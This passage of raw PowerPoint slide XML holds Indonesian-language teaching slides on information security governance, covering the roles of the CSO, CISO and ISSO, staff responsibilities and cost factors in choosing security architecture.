              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Chief Security Officer (CSO) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Chief Information Security Officer (CISO).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Staf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesialis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompetensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Information Systems Security Officer, ISSO).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Staf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nonteknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>undang-undang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehati-hatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kewajiban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24062485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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengeluaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modal di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdepresiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kewajiban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
